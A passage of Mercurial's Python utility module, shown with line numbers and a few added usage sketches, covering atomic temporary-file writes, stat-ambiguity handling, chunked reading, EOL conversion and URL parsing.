1921 1942 suffix='1~', dir=os.path.dirname(testfile))
1922 1943 os.close(fd)
1923 1944 f2 = '%s2~' % f1[:-2]
1924 1945
1925 1946 oslink(f1, f2)
1926 1947 # nlinks() may behave differently for files on Windows shares if
1927 1948 # the file is open.
1928 1949 fp = posixfile(f2)
1929 1950 return nlinks(f2) > 1
1930 1951 except OSError:
1931 1952 return False
1932 1953 finally:
1933 1954 if fp is not None:
1934 1955 fp.close()
1935 1956 for f in (f1, f2):
1936 1957 try:
1937 1958 if f is not None:
1938 1959 os.unlink(f)
1939 1960 except OSError:
1940 1961 pass
1941 1962
1942 1963 def endswithsep(path):
1943 1964 '''Check path ends with os.sep or os.altsep.'''
1944 1965 return (path.endswith(pycompat.ossep)
1945 1966 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1946 1967
1947 1968 def splitpath(path):
1948 1969 '''Split path by os.sep.
1949 1970 Note that this function does not use os.altsep because it is
1950 1971 merely an alternative to a simple "xxx.split(os.sep)".
1951 1972 It is recommended to use os.path.normpath() before using this
1952 1973 function if needed.'''
1953 1974 return path.split(pycompat.ossep)
1954 1975
1955 1976 def mktempcopy(name, emptyok=False, createmode=None):
1956 1977 """Create a temporary file with the same contents from name
1957 1978
1958 1979 The permission bits are copied from the original file.
1959 1980
1960 1981 If the temporary file is going to be truncated immediately, you
1961 1982 can use emptyok=True as an optimization.
1962 1983
1963 1984 Returns the name of the temporary file.
1964 1985 """
1965 1986 d, fn = os.path.split(name)
1966 1987 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1967 1988 os.close(fd)
1968 1989 # Temporary files are created with mode 0600, which is usually not
1969 1990 # what we want. If the original file already exists, just copy
1970 1991 # its mode. Otherwise, manually obey umask.
1971 1992 copymode(name, temp, createmode)
1972 1993 if emptyok:
1973 1994 return temp
1974 1995 try:
1975 1996 try:
1976 1997 ifp = posixfile(name, "rb")
1977 1998 except IOError as inst:
1978 1999 if inst.errno == errno.ENOENT:
1979 2000 return temp
1980 2001 if not getattr(inst, 'filename', None):
1981 2002 inst.filename = name
1982 2003 raise
1983 2004 ofp = posixfile(temp, "wb")
1984 2005 for chunk in filechunkiter(ifp):
1985 2006 ofp.write(chunk)
1986 2007 ifp.close()
1987 2008 ofp.close()
1988 2009 except: # re-raises
1989 2010 try:
1990 2011 os.unlink(temp)
1991 2012 except OSError:
1992 2013 pass
1993 2014 raise
1994 2015 return temp
1995 2016
1996 2017 class filestat(object):
1997 2018 """help to exactly detect change of a file
1998 2019
1999 2020 'stat' attribute is result of 'os.stat()' if specified 'path'
2000 2021 exists. Otherwise, it is None. This can avoid preparative
2001 2022 'exists()' examination on client side of this class.
2002 2023 """
2003 2024 def __init__(self, stat):
2004 2025 self.stat = stat
2005 2026
2006 2027 @classmethod
2007 2028 def frompath(cls, path):
2008 2029 try:
2009 2030 stat = os.stat(path)
2010 2031 except OSError as err:
2011 2032 if err.errno != errno.ENOENT:
2012 2033 raise
2013 2034 stat = None
2014 2035 return cls(stat)
2015 2036
2016 2037 @classmethod
2017 2038 def fromfp(cls, fp):
2018 2039 stat = os.fstat(fp.fileno())
2019 2040 return cls(stat)
2020 2041
2021 2042 __hash__ = object.__hash__
2022 2043
2023 2044 def __eq__(self, old):
2024 2045 try:
2025 2046 # if ambiguity between stat of new and old file is
2026 2047 # avoided, comparison of size, ctime and mtime is enough
2027 2048 # to exactly detect change of a file regardless of platform
2028 2049 return (self.stat.st_size == old.stat.st_size and
2029 2050 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2030 2051 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2031 2052 except AttributeError:
2032 2053 pass
2033 2054 try:
2034 2055 return self.stat is None and old.stat is None
2035 2056 except AttributeError:
2036 2057 return False
2037 2058
2038 2059 def isambig(self, old):
2039 2060 """Examine whether new (= self) stat is ambiguous against old one
2040 2061
2041 2062 "S[N]" below means stat of a file at N-th change:
2042 2063
2043 2064 - S[n-1].ctime < S[n].ctime: can detect change of a file
2044 2065 - S[n-1].ctime == S[n].ctime
2045 2066 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2046 2067 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2047 2068 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2048 2069 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2049 2070
2050 2071 Case (*2) above means that a file was changed twice or more at
2051 2072 same time in sec (= S[n-1].ctime), and comparison of timestamp
2052 2073 is ambiguous.
2053 2074
2054 2075 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2055 2076 timestamp is ambiguous".
2056 2077
2057 2078 But advancing mtime only in case (*2) doesn't work as
2058 2079 expected, because naturally advanced S[n].mtime in case (*1)
2059 2080 might be equal to manually advanced S[n-1 or earlier].mtime.
2060 2081
2061 2082 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2062 2083 treated as ambiguous regardless of mtime, to avoid changes being
2063 2084 overlooked due to collisions between such mtimes.
2064 2085
2065 2086 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2066 2087 S[n].mtime", even if size of a file isn't changed.
2067 2088 """
2068 2089 try:
2069 2090 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2070 2091 except AttributeError:
2071 2092 return False
2072 2093
2073 2094 def avoidambig(self, path, old):
2074 2095 """Change file stat of specified path to avoid ambiguity
2075 2096
2076 2097 'old' should be previous filestat of 'path'.
2077 2098
2078 2099 Ambiguity avoidance is skipped if the process doesn't have
2079 2100 appropriate privileges for 'path'; False is returned in that
2080 2101 case.
2081 2102
2082 2103 Otherwise, this returns True, as "ambiguity is avoided".
2083 2104 """
2084 2105 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2085 2106 try:
2086 2107 os.utime(path, (advanced, advanced))
2087 2108 except OSError as inst:
2088 2109 if inst.errno == errno.EPERM:
2089 2110 # utime() on the file created by another user causes EPERM,
2090 2111 # if a process doesn't have appropriate privileges
2091 2112 return False
2092 2113 raise
2093 2114 return True
2094 2115
2095 2116 def __ne__(self, other):
2096 2117 return not self == other
2097 2118
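# Usage sketch: the ambiguity scheme above in practice. If a file is
# rewritten within the same second, the new stat can compare ambiguous to
# the old one, so mtime is nudged forward to keep the change detectable.
# _exampleavoidambig is hypothetical.
def _exampleavoidambig(path):
    old = filestat.frompath(path)
    writefile(path, b'new content')
    new = filestat.frompath(path)
    if new.isambig(old):
        new.avoidambig(path, old)
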
2098 2119 class atomictempfile(object):
2099 2120 '''writable file object that atomically updates a file
2100 2121
2101 2122 All writes will go to a temporary copy of the original file. Call
2102 2123 close() when you are done writing, and atomictempfile will rename
2103 2124 the temporary copy to the original name, making the changes
2104 2125 visible. If the object is destroyed without being closed, all your
2105 2126 writes are discarded.
2106 2127
2107 2128 checkambig argument of constructor is used with filestat, and is
2108 2129 useful only if target file is guarded by any lock (e.g. repo.lock
2109 2130 or repo.wlock).
2110 2131 '''
2111 2132 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2112 2133 self.__name = name # permanent name
2113 2134 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2114 2135 createmode=createmode)
2115 2136 self._fp = posixfile(self._tempname, mode)
2116 2137 self._checkambig = checkambig
2117 2138
2118 2139 # delegated methods
2119 2140 self.read = self._fp.read
2120 2141 self.write = self._fp.write
2121 2142 self.seek = self._fp.seek
2122 2143 self.tell = self._fp.tell
2123 2144 self.fileno = self._fp.fileno
2124 2145
2125 2146 def close(self):
2126 2147 if not self._fp.closed:
2127 2148 self._fp.close()
2128 2149 filename = localpath(self.__name)
2129 2150 oldstat = self._checkambig and filestat.frompath(filename)
2130 2151 if oldstat and oldstat.stat:
2131 2152 rename(self._tempname, filename)
2132 2153 newstat = filestat.frompath(filename)
2133 2154 if newstat.isambig(oldstat):
2134 2155 # stat of changed file is ambiguous to original one
2135 2156 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2136 2157 os.utime(filename, (advanced, advanced))
2137 2158 else:
2138 2159 rename(self._tempname, filename)
2139 2160
2140 2161 def discard(self):
2141 2162 if not self._fp.closed:
2142 2163 try:
2143 2164 os.unlink(self._tempname)
2144 2165 except OSError:
2145 2166 pass
2146 2167 self._fp.close()
2147 2168
2148 2169 def __del__(self):
2149 2170 if safehasattr(self, '_fp'): # constructor actually did something
2150 2171 self.discard()
2151 2172
2152 2173 def __enter__(self):
2153 2174 return self
2154 2175
2155 2176 def __exit__(self, exctype, excvalue, traceback):
2156 2177 if exctype is not None:
2157 2178 self.discard()
2158 2179 else:
2159 2180 self.close()
2160 2181
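# Usage sketch: writes land in a temporary copy and replace the target only
# on a clean close; an exception inside the block discards them instead.
# _exampleatomicwrite is hypothetical.
def _exampleatomicwrite(name, data):
    with atomictempfile(name, b'wb') as fp:
        fp.write(data)
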
2161 2182 def unlinkpath(f, ignoremissing=False, rmdir=True):
2162 2183 """unlink and remove the directory if it is empty"""
2163 2184 if ignoremissing:
2164 2185 tryunlink(f)
2165 2186 else:
2166 2187 unlink(f)
2167 2188 if rmdir:
2168 2189 # try removing directories that might now be empty
2169 2190 try:
2170 2191 removedirs(os.path.dirname(f))
2171 2192 except OSError:
2172 2193 pass
2173 2194
2174 2195 def tryunlink(f):
2175 2196 """Attempt to remove a file, ignoring ENOENT errors."""
2176 2197 try:
2177 2198 unlink(f)
2178 2199 except OSError as e:
2179 2200 if e.errno != errno.ENOENT:
2180 2201 raise
2181 2202
2182 2203 def makedirs(name, mode=None, notindexed=False):
2183 2204 """recursive directory creation with parent mode inheritance
2184 2205
2185 2206 Newly created directories are marked as "not to be indexed by
2186 2207 the content indexing service", if ``notindexed`` is specified
2187 2208 for "write" mode access.
2188 2209 """
2189 2210 try:
2190 2211 makedir(name, notindexed)
2191 2212 except OSError as err:
2192 2213 if err.errno == errno.EEXIST:
2193 2214 return
2194 2215 if err.errno != errno.ENOENT or not name:
2195 2216 raise
2196 2217 parent = os.path.dirname(os.path.abspath(name))
2197 2218 if parent == name:
2198 2219 raise
2199 2220 makedirs(parent, mode, notindexed)
2200 2221 try:
2201 2222 makedir(name, notindexed)
2202 2223 except OSError as err:
2203 2224 # Catch EEXIST to handle races
2204 2225 if err.errno == errno.EEXIST:
2205 2226 return
2206 2227 raise
2207 2228 if mode is not None:
2208 2229 os.chmod(name, mode)
2209 2230
2210 2231 def readfile(path):
2211 2232 with open(path, 'rb') as fp:
2212 2233 return fp.read()
2213 2234
2214 2235 def writefile(path, text):
2215 2236 with open(path, 'wb') as fp:
2216 2237 fp.write(text)
2217 2238
2218 2239 def appendfile(path, text):
2219 2240 with open(path, 'ab') as fp:
2220 2241 fp.write(text)
2221 2242
2222 2243 class chunkbuffer(object):
2223 2244 """Allow data to be read in arbitrarily sized reads from an
2224 2245 iterator over chunks of arbitrary size."""
2225 2246
2226 2247 def __init__(self, in_iter):
2227 2248 """in_iter is the iterator that's iterating over the input chunks."""
2228 2249 def splitbig(chunks):
2229 2250 for chunk in chunks:
2230 2251 if len(chunk) > 2**20:
2231 2252 pos = 0
2232 2253 while pos < len(chunk):
2233 2254 end = pos + 2 ** 18
2234 2255 yield chunk[pos:end]
2235 2256 pos = end
2236 2257 else:
2237 2258 yield chunk
2238 2259 self.iter = splitbig(in_iter)
2239 2260 self._queue = collections.deque()
2240 2261 self._chunkoffset = 0
2241 2262
2242 2263 def read(self, l=None):
2243 2264 """Read L bytes of data from the iterator of chunks of data.
2244 2265 Returns less than L bytes if the iterator runs dry.
2245 2266
2246 2267 If the size parameter is omitted, read everything."""
2247 2268 if l is None:
2248 2269 return ''.join(self.iter)
2249 2270
2250 2271 left = l
2251 2272 buf = []
2252 2273 queue = self._queue
2253 2274 while left > 0:
2254 2275 # refill the queue
2255 2276 if not queue:
2256 2277 target = 2**18
2257 2278 for chunk in self.iter:
2258 2279 queue.append(chunk)
2259 2280 target -= len(chunk)
2260 2281 if target <= 0:
2261 2282 break
2262 2283 if not queue:
2263 2284 break
2264 2285
2265 2286 # The easy way to do this would be to queue.popleft(), modify the
2266 2287 # chunk (if necessary), then queue.appendleft(). However, for cases
2267 2288 # where we read partial chunk content, this incurs 2 dequeue
2268 2289 # mutations and creates a new str for the remaining chunk in the
2269 2290 # queue. Our code below avoids this overhead.
2270 2291
2271 2292 chunk = queue[0]
2272 2293 chunkl = len(chunk)
2273 2294 offset = self._chunkoffset
2274 2295
2275 2296 # Use full chunk.
2276 2297 if offset == 0 and left >= chunkl:
2277 2298 left -= chunkl
2278 2299 queue.popleft()
2279 2300 buf.append(chunk)
2280 2301 # self._chunkoffset remains at 0.
2281 2302 continue
2282 2303
2283 2304 chunkremaining = chunkl - offset
2284 2305
2285 2306 # Use all of unconsumed part of chunk.
2286 2307 if left >= chunkremaining:
2287 2308 left -= chunkremaining
2288 2309 queue.popleft()
2289 2310 # offset == 0 is enabled by block above, so this won't merely
2290 2311 # copy via ``chunk[0:]``.
2291 2312 buf.append(chunk[offset:])
2292 2313 self._chunkoffset = 0
2293 2314
2294 2315 # Partial chunk needed.
2295 2316 else:
2296 2317 buf.append(chunk[offset:offset + left])
2297 2318 self._chunkoffset += left
2298 2319 left -= chunkremaining
2299 2320
2300 2321 return ''.join(buf)
2301 2322
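# Usage sketch: chunkbuffer turns arbitrarily sized input chunks into
# fixed-size reads without restitching the whole stream up front.
# _examplechunkbuffer is hypothetical.
def _examplechunkbuffer():
    buf = chunkbuffer(iter([b'abc', b'defgh', b'i']))
    first = buf.read(4)  # b'abcd', spanning two input chunks
    rest = buf.read(5)   # b'efghi', finishing the partially read chunk
    return first, rest
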
2302 2323 def filechunkiter(f, size=131072, limit=None):
2303 2324 """Create a generator that produces the data in the file size
2304 2325 (default 131072) bytes at a time, up to optional limit (default is
2305 2326 to read all data). Chunks may be less than size bytes if the
2306 2327 chunk is the last chunk in the file, or the file is a socket or
2307 2328 some other type of file that sometimes reads less data than is
2308 2329 requested."""
2309 2330 assert size >= 0
2310 2331 assert limit is None or limit >= 0
2311 2332 while True:
2312 2333 if limit is None:
2313 2334 nbytes = size
2314 2335 else:
2315 2336 nbytes = min(limit, size)
2316 2337 s = nbytes and f.read(nbytes)
2317 2338 if not s:
2318 2339 break
2319 2340 if limit:
2320 2341 limit -= len(s)
2321 2342 yield s
2322 2343
2323 2344 class cappedreader(object):
2324 2345 """A file object proxy that allows reading up to N bytes.
2325 2346
2326 2347 Given a source file object, instances of this type allow reading up to
2327 2348 N bytes from that source file object. Attempts to read past the allowed
2328 2349 limit are treated as EOF.
2329 2350
2330 2351 It is assumed that I/O is not performed on the original file object
2331 2352 in addition to I/O that is performed by this instance. If there is,
2332 2353 state tracking will get out of sync and unexpected results will ensue.
2333 2354 """
2334 2355 def __init__(self, fh, limit):
2335 2356 """Allow reading up to <limit> bytes from <fh>."""
2336 2357 self._fh = fh
2337 2358 self._left = limit
2338 2359
2339 2360 def read(self, n=-1):
2340 2361 if not self._left:
2341 2362 return b''
2342 2363
2343 2364 if n < 0:
2344 2365 n = self._left
2345 2366
2346 2367 data = self._fh.read(min(n, self._left))
2347 2368 self._left -= len(data)
2348 2369 assert self._left >= 0
2349 2370
2350 2371 return data
2351 2372
2352 2373 def readinto(self, b):
2353 2374 res = self.read(len(b))
2354 2375 if res is None:
2355 2376 return None
2356 2377
2357 2378 b[0:len(res)] = res
2358 2379 return len(res)
2359 2380
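# Usage sketch: cappedreader exposes at most N bytes of the underlying file
# object and turns reads past the limit into EOF. _examplecappedreader is
# hypothetical.
def _examplecappedreader(fh):
    capped = cappedreader(fh, 10)
    head = capped.read()   # at most the first 10 bytes of fh
    tail = capped.read(1)  # b'' once the limit is reached
    return head, tail
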
2360 2381 def unitcountfn(*unittable):
2361 2382 '''return a function that renders a readable count of some quantity'''
2362 2383
2363 2384 def go(count):
2364 2385 for multiplier, divisor, format in unittable:
2365 2386 if abs(count) >= divisor * multiplier:
2366 2387 return format % (count / float(divisor))
2367 2388 return unittable[-1][2] % count
2368 2389
2369 2390 return go
2370 2391
2371 2392 def processlinerange(fromline, toline):
2372 2393 """Check that linerange <fromline>:<toline> makes sense and return a
2373 2394 0-based range.
2374 2395
2375 2396 >>> processlinerange(10, 20)
2376 2397 (9, 20)
2377 2398 >>> processlinerange(2, 1)
2378 2399 Traceback (most recent call last):
2379 2400 ...
2380 2401 ParseError: line range must be positive
2381 2402 >>> processlinerange(0, 5)
2382 2403 Traceback (most recent call last):
2383 2404 ...
2384 2405 ParseError: fromline must be strictly positive
2385 2406 """
2386 2407 if toline - fromline < 0:
2387 2408 raise error.ParseError(_("line range must be positive"))
2388 2409 if fromline < 1:
2389 2410 raise error.ParseError(_("fromline must be strictly positive"))
2390 2411 return fromline - 1, toline
2391 2412
2392 2413 bytecount = unitcountfn(
2393 2414 (100, 1 << 30, _('%.0f GB')),
2394 2415 (10, 1 << 30, _('%.1f GB')),
2395 2416 (1, 1 << 30, _('%.2f GB')),
2396 2417 (100, 1 << 20, _('%.0f MB')),
2397 2418 (10, 1 << 20, _('%.1f MB')),
2398 2419 (1, 1 << 20, _('%.2f MB')),
2399 2420 (100, 1 << 10, _('%.0f KB')),
2400 2421 (10, 1 << 10, _('%.1f KB')),
2401 2422 (1, 1 << 10, _('%.2f KB')),
2402 2423 (1, 1, _('%.0f bytes')),
2403 2424 )
2404 2425
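# Worked example: unitcountfn scans its rows top-down and picks the first
# whose threshold matches, so bytecount scales and formats in one step:
#
#   bytecount(2252)     -> '2.20 KB'  (1 <= 2252/1024 < 10)
#   bytecount(10485760) -> '10.0 MB'
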
2405 2426 class transformingwriter(object):
2406 2427 """Writable file wrapper to transform data by function"""
2407 2428
2408 2429 def __init__(self, fp, encode):
2409 2430 self._fp = fp
2410 2431 self._encode = encode
2411 2432
2412 2433 def close(self):
2413 2434 self._fp.close()
2414 2435
2415 2436 def flush(self):
2416 2437 self._fp.flush()
2417 2438
2418 2439 def write(self, data):
2419 2440 return self._fp.write(self._encode(data))
2420 2441
2421 2442 # Matches a single EOL which can either be a CRLF where repeated CR
2422 2443 # are removed or a LF. We do not care about old Macintosh files, so a
2423 2444 # stray CR is an error.
2424 2445 _eolre = remod.compile(br'\r*\n')
2425 2446
2426 2447 def tolf(s):
2427 2448 return _eolre.sub('\n', s)
2428 2449
2429 2450 def tocrlf(s):
2430 2451 return _eolre.sub('\r\n', s)
2431 2452
2432 2453 def _crlfwriter(fp):
2433 2454 return transformingwriter(fp, tocrlf)
2434 2455
2435 2456 if pycompat.oslinesep == '\r\n':
2436 2457 tonativeeol = tocrlf
2437 2458 fromnativeeol = tolf
2438 2459 nativeeolwriter = _crlfwriter
2439 2460 else:
2440 2461 tonativeeol = pycompat.identity
2441 2462 fromnativeeol = pycompat.identity
2442 2463 nativeeolwriter = pycompat.identity
2443 2464
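# Usage sketch: on LF platforms the three names above are identity
# functions, so callers can apply them unconditionally; only on CRLF
# platforms do they convert. _examplenativeeol is hypothetical.
def _examplenativeeol(fp):
    w = nativeeolwriter(fp)  # plain passthrough on LF platforms
    w.write(b'one\ntwo\n')   # written as CRLF where the OS expects it
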
2444 2465 if (pyplatform.python_implementation() == 'CPython' and
2445 2466 sys.version_info < (3, 0)):
2446 2467 # There is an issue in CPython that some IO methods do not handle EINTR
2447 2468 # correctly. The following table shows what CPython version (and functions)
2448 2469 # are affected (buggy: has the EINTR bug, okay: otherwise):
2449 2470 #
2450 2471 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2451 2472 # --------------------------------------------------
2452 2473 # fp.__iter__ | buggy | buggy | okay
2453 2474 # fp.read* | buggy | okay [1] | okay
2454 2475 #
2455 2476 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2456 2477 #
2457 2478 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2458 2479 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2459 2480 #
2460 2481 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2461 2482 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2462 2483 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2463 2484 # fp.__iter__ but not other fp.read* methods.
2464 2485 #
2465 2486 # On modern systems like Linux, the "read" syscall cannot be interrupted
2466 2487 # when reading "fast" files like on-disk files. So the EINTR issue only
2467 2488 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2468 2489 # files approximately as "fast" files and use the fast (unsafe) code path,
2469 2490 # to minimize the performance impact.
2470 2491 if sys.version_info >= (2, 7, 4):
2471 2492 # fp.readline deals with EINTR correctly, use it as a workaround.
2472 2493 def _safeiterfile(fp):
2473 2494 return iter(fp.readline, '')
2474 2495 else:
2475 2496 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2476 2497 # note: this may block longer than necessary because of bufsize.
2477 2498 def _safeiterfile(fp, bufsize=4096):
2478 2499 fd = fp.fileno()
2479 2500 line = ''
2480 2501 while True:
2481 2502 try:
2482 2503 buf = os.read(fd, bufsize)
2483 2504 except OSError as ex:
2484 2505 # os.read only raises EINTR before any data is read
2485 2506 if ex.errno == errno.EINTR:
2486 2507 continue
2487 2508 else:
2488 2509 raise
2489 2510 line += buf
2490 2511 if '\n' in buf:
2491 2512 splitted = line.splitlines(True)
2492 2513 line = ''
2493 2514 for l in splitted:
2494 2515 if l[-1] == '\n':
2495 2516 yield l
2496 2517 else:
2497 2518 line = l
2498 2519 if not buf:
2499 2520 break
2500 2521 if line:
2501 2522 yield line
2502 2523
2503 2524 def iterfile(fp):
2504 2525 fastpath = True
2505 2526 if type(fp) is file:
2506 2527 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2507 2528 if fastpath:
2508 2529 return fp
2509 2530 else:
2510 2531 return _safeiterfile(fp)
2511 2532 else:
2512 2533 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2513 2534 def iterfile(fp):
2514 2535 return fp
2515 2536
2516 2537 def iterlines(iterator):
2517 2538 for chunk in iterator:
2518 2539 for line in chunk.splitlines():
2519 2540 yield line
2520 2541
2521 2542 def expandpath(path):
2522 2543 return os.path.expanduser(os.path.expandvars(path))
2523 2544
2524 2545 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2525 2546 """Return the result of interpolating items in the mapping into string s.
2526 2547
2527 2548 prefix is a single character string, or a two character string with
2528 2549 a backslash as the first character if the prefix needs to be escaped in
2529 2550 a regular expression.
2530 2551
2531 2552 fn is an optional function that will be applied to the replacement text
2532 2553 just before replacement.
2533 2554
2534 2555 escape_prefix is an optional flag that allows a doubled prefix to be
2535 2556 used as an escape for the prefix character itself.
2536 2557 """
2537 2558 fn = fn or (lambda s: s)
2538 2559 patterns = '|'.join(mapping.keys())
2539 2560 if escape_prefix:
2540 2561 patterns += '|' + prefix
2541 2562 if len(prefix) > 1:
2542 2563 prefix_char = prefix[1:]
2543 2564 else:
2544 2565 prefix_char = prefix
2545 2566 mapping[prefix_char] = prefix_char
2546 2567 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2547 2568 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2548 2569
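# Usage sketch: with escape_prefix=True a doubled prefix escapes itself, so
# a literal '$' can survive substitution. _exampleinterpolate and its
# mapping are hypothetical.
def _exampleinterpolate():
    mapping = {b'user': b'alice'}
    # -> b'hi alice, cost $5'
    return interpolate(br'\$', mapping, b'hi $user, cost $$5',
                       escape_prefix=True)
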
2549 2570 def getport(port):
2550 2571 """Return the port for a given network service.
2551 2572
2552 2573 If port is an integer, it's returned as is. If it's a string, it's
2553 2574 looked up using socket.getservbyname(). If there's no matching
2554 2575 service, error.Abort is raised.
2555 2576 """
2556 2577 try:
2557 2578 return int(port)
2558 2579 except ValueError:
2559 2580 pass
2560 2581
2561 2582 try:
2562 2583 return socket.getservbyname(pycompat.sysstr(port))
2563 2584 except socket.error:
2564 2585 raise error.Abort(_("no port number associated with service '%s'")
2565 2586 % port)
2566 2587
2567 2588 class url(object):
2568 2589 r"""Reliable URL parser.
2569 2590
2570 2591 This parses URLs and provides attributes for the following
2571 2592 components:
2572 2593
2573 2594 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2574 2595
2575 2596 Missing components are set to None. The only exception is
2576 2597 fragment, which is set to '' if present but empty.
2577 2598
2578 2599 If parsefragment is False, fragment is included in query. If
2579 2600 parsequery is False, query is included in path. If both are
2580 2601 False, both fragment and query are included in path.
2581 2602
2582 2603 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2583 2604
2584 2605 Note that for backward compatibility reasons, bundle URLs do not
2585 2606 take host names. That means 'bundle://../' has a path of '../'.
2586 2607
2587 2608 Examples:
2588 2609
2589 2610 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2590 2611 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2591 2612 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2592 2613 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2593 2614 >>> url(b'file:///home/joe/repo')
2594 2615 <url scheme: 'file', path: '/home/joe/repo'>
2595 2616 >>> url(b'file:///c:/temp/foo/')
2596 2617 <url scheme: 'file', path: 'c:/temp/foo/'>
2597 2618 >>> url(b'bundle:foo')
2598 2619 <url scheme: 'bundle', path: 'foo'>
2599 2620 >>> url(b'bundle://../foo')
2600 2621 <url scheme: 'bundle', path: '../foo'>
2601 2622 >>> url(br'c:\foo\bar')
2602 2623 <url path: 'c:\\foo\\bar'>
2603 2624 >>> url(br'\\blah\blah\blah')
2604 2625 <url path: '\\\\blah\\blah\\blah'>
2605 2626 >>> url(br'\\blah\blah\blah#baz')
2606 2627 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2607 2628 >>> url(br'file:///C:\users\me')
2608 2629 <url scheme: 'file', path: 'C:\\users\\me'>
2609 2630
2610 2631 Authentication credentials:
2611 2632
2612 2633 >>> url(b'ssh://joe:xyz@x/repo')
2613 2634 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2614 2635 >>> url(b'ssh://joe@x/repo')
2615 2636 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2616 2637
2617 2638 Query strings and fragments:
2618 2639
2619 2640 >>> url(b'http://host/a?b#c')
2620 2641 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2621 2642 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2622 2643 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2623 2644
2624 2645 Empty path:
2625 2646
2626 2647 >>> url(b'')
2627 2648 <url path: ''>
2628 2649 >>> url(b'#a')
2629 2650 <url path: '', fragment: 'a'>
2630 2651 >>> url(b'http://host/')
2631 2652 <url scheme: 'http', host: 'host', path: ''>
2632 2653 >>> url(b'http://host/#a')
2633 2654 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2634 2655
2635 2656 Only scheme:
2636 2657
2637 2658 >>> url(b'http:')
2638 2659 <url scheme: 'http'>
2639 2660 """
2640 2661
2641 2662 _safechars = "!~*'()+"
2642 2663 _safepchars = "/!~*'()+:\\"
2643 2664 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2644 2665
2645 2666 def __init__(self, path, parsequery=True, parsefragment=True):
2646 2667 # We slowly chomp away at path until we have only the path left
2647 2668 self.scheme = self.user = self.passwd = self.host = None
2648 2669 self.port = self.path = self.query = self.fragment = None
2649 2670 self._localpath = True
2650 2671 self._hostport = ''
2651 2672 self._origpath = path
2652 2673
2653 2674 if parsefragment and '#' in path:
2654 2675 path, self.fragment = path.split('#', 1)
2655 2676
2656 2677 # special case for Windows drive letters and UNC paths
2657 2678 if hasdriveletter(path) or path.startswith('\\\\'):
2658 2679 self.path = path
2659 2680 return
2660 2681
2661 2682 # For compatibility reasons, we can't handle bundle paths as
2662 2683 # normal URLS
2663 2684 if path.startswith('bundle:'):
2664 2685 self.scheme = 'bundle'
2665 2686 path = path[7:]
2666 2687 if path.startswith('//'):
2667 2688 path = path[2:]
2668 2689 self.path = path
2669 2690 return
2670 2691
2671 2692 if self._matchscheme(path):
2672 2693 parts = path.split(':', 1)
2673 2694 if parts[0]:
2674 2695 self.scheme, path = parts
2675 2696 self._localpath = False
2676 2697
2677 2698 if not path:
2678 2699 path = None
2679 2700 if self._localpath:
2680 2701 self.path = ''
2681 2702 return
2682 2703 else:
2683 2704 if self._localpath:
2684 2705 self.path = path
2685 2706 return
2686 2707
2687 2708 if parsequery and '?' in path:
2688 2709 path, self.query = path.split('?', 1)
2689 2710 if not path:
2690 2711 path = None
2691 2712 if not self.query:
2692 2713 self.query = None
2693 2714
2694 2715 # // is required to specify a host/authority
2695 2716 if path and path.startswith('//'):
2696 2717 parts = path[2:].split('/', 1)
2697 2718 if len(parts) > 1:
2698 2719 self.host, path = parts
2699 2720 else:
2700 2721 self.host = parts[0]
2701 2722 path = None
2702 2723 if not self.host:
2703 2724 self.host = None
2704 2725 # path of file:///d is /d
2705 2726 # path of file:///d:/ is d:/, not /d:/
2706 2727 if path and not hasdriveletter(path):
2707 2728 path = '/' + path
2708 2729
2709 2730 if self.host and '@' in self.host:
2710 2731 self.user, self.host = self.host.rsplit('@', 1)
2711 2732 if ':' in self.user:
2712 2733 self.user, self.passwd = self.user.split(':', 1)
2713 2734 if not self.host:
2714 2735 self.host = None
2715 2736
2716 2737 # Don't split on colons in IPv6 addresses without ports
2717 2738 if (self.host and ':' in self.host and
2718 2739 not (self.host.startswith('[') and self.host.endswith(']'))):
2719 2740 self._hostport = self.host
2720 2741 self.host, self.port = self.host.rsplit(':', 1)
2721 2742 if not self.host:
2722 2743 self.host = None
2723 2744
